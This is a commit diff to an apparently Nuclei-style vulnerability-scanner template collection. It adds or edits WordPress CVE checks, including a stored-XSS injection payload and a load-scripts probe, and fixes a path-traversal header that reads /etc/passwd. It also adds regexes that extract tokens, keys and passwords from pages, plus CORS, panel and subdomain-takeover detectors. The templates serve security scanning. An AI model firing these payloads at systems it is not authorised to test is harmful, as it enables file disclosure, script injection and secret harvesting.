Merge pull request #86 from Nadino92/master

improvements across multiple templates and new additions

cves/CVE-2018-18069.yaml

@@ -0,0 +1,17 @@
+id: CVE-2018-18069
+
+info:
+  name: Wordpress unauthenticated stored xss
+  author: nadino
+  severity: medium
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/wp-admin/admin.php"
+    body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN\"><html xmlns=\"hacked'
+
+    matchers:
+      - type: dsl
+        dsl:
+        - 'status_code==302 && contains(set_cookie, "_icl_current_admin_language")'

cves/CVE-2018-6389.yaml

@@ -0,0 +1,16 @@
+id: CVE-2018-6389
+
+info:
+  name: Wordpress Load Script
+  author: nadino
+  severity: high
+
+requests:
+  - method: GET
+    path: 
+      - "{{BaseURL}}/wp-admin/load-scripts.php?load="
+    matchers:
+      - type: dsl
+        dsl:
+        - 'contains(x_powered_by,"Engine")'
+        - 'contains(content_type,"javascript")'

cves/CVE-2019-5418.yaml

@@ -5,13 +5,13 @@ info:
   author: omarkurt
   severity: medium
   #reference: https://github.com/omarkurt/CVE-2019-5418
-  
+
 requests:
   - method: GET
     path:
       - "{{BaseURL}}"
     headers:
-      Accept: ../../../../../../../../etc/passwd{{
+      Accept: ../../../../../../../../etc/passwd
     matchers:
       - type: status
         status:

hosts.txt

@@ -0,0 +1 @@
+http://192.168.1.16

noisy/general-tokens.yaml

@@ -0,0 +1,32 @@
+id: general-tokens
+
+#this will create a huge load of false positive
+
+info:
+  name: General Tokens
+  author: nadino
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    matchers:
+      - type: dsl
+        dsl:
+        - 'regex("TOKEN[\\-|_|A-Z0-9]*(\''|\")?(:|=)(\''|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body)," ",""))'                  #any TOKEN word
+        - 'regex("API[\\-|_|A-Z0-9]*(\''|\")?(:|=)(\''|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body)," ",""))'                    #any API word
+        - 'regex("KEY[\\-|_|A-Z0-9]*(\''|\")?(:|=)(\''|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body)," ",""))'                    #any KEY word
+        - 'regex("SECRET[\\-|_|A-Z0-9]*(\''|\")?(:|=)(\''|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body)," ",""))'                 #any SECRET word
+        - 'regex("AUTHORIZATION[\\-|_|A-Z0-9]*(\''|\")?(:|=)(\''|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body)," ",""))'          #any AUTHORIZATION word
+        - 'regex("PASSWORD[\\-|_|A-Z0-9]*(\''|\")?(:|=)(\''|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body)," ",""))'               #any PASSWORD word
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "(T|t)(O|o)(K|k)(E|e)(N|n)[\\-|_|A-Za-z0-9]*(\''|\")?( )*(:|=)+( )*(\''|\")?[ 0-9A-Za-z\\-_]+(\''|\")?"
+          - "(A|a)(P|p)(Ii)[\\-|_|A-Za-z0-9]*(\''|\")?( )*(:|=)( )*(\''|\")?[ 0-9A-Za-z\\-_]+(\''|\")?"
+          - "(K|k)(E|e)(Y|y)[\\-|_|A-Za-z0-9]*(\''|\")?( )*(:|=)( )*(\''|\")?[ 0-9A-Za-z\\-_]+(\''|\")?"
+          - "(S|s)(E|e)(C|c)(R|r)(E|e)(T|t)[\\-|_|A-Za-z0-9]*(\''|\")?( )*(:|=)( )*(\''|\")?[ 0-9A-Za-z\\-_]+(\''|\")?"
+          - "(A|a)(U|u)(T|t)(H|h)(O|o)(R|r)(I|i)(Z|z)(A|a)(T|t)(I|i)(O|o)(N|n)[\\-|_|A-Za-z0-9]*(\''|\")?( )*(:|=)( )*(\''|\")?[ 0-9A-Za-z\\-_]+(\''|\")?"
+          - "(P|p)(A|a)(S|s)(S|s)(W|w)(O|o)(R|r)(D|d)[\\-|_|A-Za-z0-9]*(\''|\")?( )*(:|=)( )*(\''|\")?[ 0-9A-Za-z\\-_]+(\''|\")?"

noisy/general-xss.yaml

@@ -0,0 +1,19 @@
+id: General XSS
+
+info:
+  name: General XSS
+  author: nadino
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    matchers:
+      - type: word
+        words:
+          - 'a''"><injectable>'
+        part: body
+      - type: dsl
+        dsl:
+        - 'contains(content_type,"html")'

panels/crxde.yaml

@@ -0,0 +1,15 @@
+id: crxde
+
+info:
+  name: CRXDE Lite
+  author: nadino
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/crx/de/index.jsp"
+    matchers:
+      - type: word
+        words:
+          - "<title>CRXDE Lite</title>"

security-misconfiguration/basic-cors.yaml

@@ -8,7 +8,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
     headers:
       Origin: https://evil.com
     matchers:

subdomain-takeover/detect-all-takeovers.yaml

@@ -8,7 +8,7 @@ info:
   # Update this list with new takeovers matchers
   # Do not delete other template files for takeover
   # https://github.com/EdOverflow/can-i-take-over-xyz
-  # You need to claim the cname the subdomain to confirm the takeover. 
+  # You need to claim the cname the subdomain to confirm the takeover.
   # Do not report this without claiming the cname.
 
 requests:
@@ -22,17 +22,17 @@ requests:
         name: pantheon.io
         words:
           - "The gods are wise, but do not know of the site which you seek."
-      
+
       - type: word
         name: aws-s3-bucket
         words:
           - "The specified bucket does not exist"
-      
+
       - type: word
         name: anima
         words:
           - "If this is your website and you've just created it, try refreshing in a minute"
-  
+
       - type: word
         name: ghost
         words:
@@ -68,6 +68,12 @@ requests:
         - ngrok.io not found
         - Tunnel *.ngrok.io not found
 
+      - type: word
+        name: tumblr
+        words:
+        - Whatever you were looking for doesn't currently exist at this address.
+        - There's nothing here.
+
       - type: word
         name: github
         words:
@@ -277,57 +283,57 @@ requests:
         name: readme
         words:
         - Project doesnt exist... yet!
-      
+
       - type: word
         name: smugmug
         words:
         - '{"text":"Page Not Found"'
-      
+
       - type: word
         name: airee
         words:
         - Ошибка 402. Сервис Айри.рф не оплачен
-      
+
       - type: word
         name: kinsta
         words:
         - No Site For Domain
-      
+
       - type: word
         name: launchrock
         words:
         - It looks like you may have taken a wrong turn somewhere. Don't worry...it happens
           to all of us.
-      
+
       - type: word
         name: Strikingly
         words:
         - But if you're looking to build your own website
         - you've come to the right place.
-      
+
       - type: word
         name: HatenaBlog
         words:
         - 404 Blog is not found
         - Sorry, we can't find the page you're looking for.
-      
+
       - type: word
         name: wufoo
         words:
         - Profile not found
         - Hmmm....something is not right.
-      
+
       - type: word
         name: hubspot
         words:
         - Domain not found
         - does not exist in our system
-      
+
       - type: word
         name: jazzhr
         words:
         - This account no longer active
-      
+
       - type: word
         name: smartjob
         words:
@@ -339,19 +345,19 @@ requests:
         name: Uptimerobot
         regex:
             - "^page not found$"
-      
+
       - type: word
-        name: agile 
+        name: agile
         words:
           - Sorry, this page is no longer available.
-      
+
       - type: word
-        name: pingdom 
+        name: pingdom
         words:
           - Public Report Not Activated
           - This public report page has not been activated by the user
-          
+
       - type: word
-        name: zendesk 
+        name: zendesk
         words:
           - this help center no longer exists

tokens/amazon-mws-auth-token-value.yaml

@@ -1,22 +1,22 @@
 id: amazon-mws-auth-token-value
-info: 
+info:
   author: puzzlepeaches
   name: "Amazon MWS Auth Token"
   severity: medium
-requests: 
+requests:
-  - 
+  -
-    extractors: 
+    extractors:
-      - 
+      -
         part: body
-        regex: 
+        regex:
           - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"
         type: regex
-    matchers: 
+    matchers:
-      - 
+      -
         part: body
-        regex: 
+        regex:
           - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"
         type: regex
     method: GET
-    path: 
+    path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"

tokens/aws-access-key-value.yaml

@@ -8,7 +8,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
     matchers:
       - type: regex
         part: body
@@ -18,4 +18,4 @@ requests:
       - type: regex
         part: body
         regex:
-          - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}"
+          - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}"

tokens/google-api-key.yaml

@@ -8,7 +8,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
     matchers:
       - type: regex
         part: body

tokens/mailchimp-api-key.yaml

@@ -8,7 +8,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
     matchers:
       - type: regex
         part: body

tokens/slack-access-token.yaml

@@ -11,7 +11,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
     matchers:
       - type: regex
         part: body